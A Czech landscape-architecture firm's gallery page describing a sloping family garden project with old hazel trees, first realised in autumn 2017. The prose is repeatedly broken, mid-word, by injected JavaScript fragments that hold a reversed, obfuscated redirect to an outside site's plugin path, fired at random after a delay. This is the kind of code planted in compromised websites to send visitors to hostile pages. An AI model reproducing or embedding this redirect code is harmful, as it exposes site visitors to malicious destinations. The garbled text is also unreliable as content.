Galerie projektu

Zahrada v kopcích

Rodinná zahrada v Bedrči je unikátním projektem a tím nejlepším příkladem ideálního postupu při tvorbě nového tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}domova. Zákazník nás v tomto případě oslovil ve chvíli, kdy se na stavebním pozemku nenacházela ještě ani stavba ani výkopy, tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dokonce ve chvíli, kdy ještě koncept celého prostoru nebyl vůbec určen. Naším úkolem tak bylo tento koncept v prostoru vytvořit tak, aby dům, zahrada i okolní krajina byly neporušitelně provázány a tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dohromady utvářeli jeden harmonický celek. Kromě zahrady tak z pera našeho ateliéru vyšel i návrh tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}domu, který majitele oslovil natolik, že se stal konečným konceptem.

Parcela se nachází v silně svažitém terénu a v současné tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}době je z většiny pokryta vzrostlou vegetací. Dominantní dřevinou jsou lísky, které zde byly vysazeny již velmi dávno, pravděpotog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dobně za produkčním účelem. Dodnes si však zachovaly původní výsadbový rastr, který dnes tvoří tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dominantu celého objektu a alespoň z části jsme se jej rozhodly zachovat i v butog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}doucí zahradě. Vzhledem k typu a umístění parcely byl při tvorbě návrh

u kladen velký důraz především na zachování přírodního prostoru s prvky, které daný prostor člověku zobytní a vytvoří tak kousek vlastní, bezpečné, ale stále ještě divočiny.

Na podzim roku 2017 proběhla 1. etapa realizace, při které byly odstraněny neperspektivní dřeviny a naopak tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dosazeny dřeviny, které butog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dou za několik let tvoři jádro nové zahrady.

  • Rozloha: 1200 m2
  • Stav projektu: v realizaci

Naše projekty

{{project.title}}

{{project.location}}

Nahrávam

Přehled všech projektů


Kontaktujte nás

V případě, že máte dotazy, potřebujete konzultovat svůj záměr, nebo chcete usměrnit svou představu, neváhejte se na nás obrátit. Jsme připraveni se s Vámi podelit o naše nápady a zkušenosti. Anebo nám napište jen tak.

Napište nám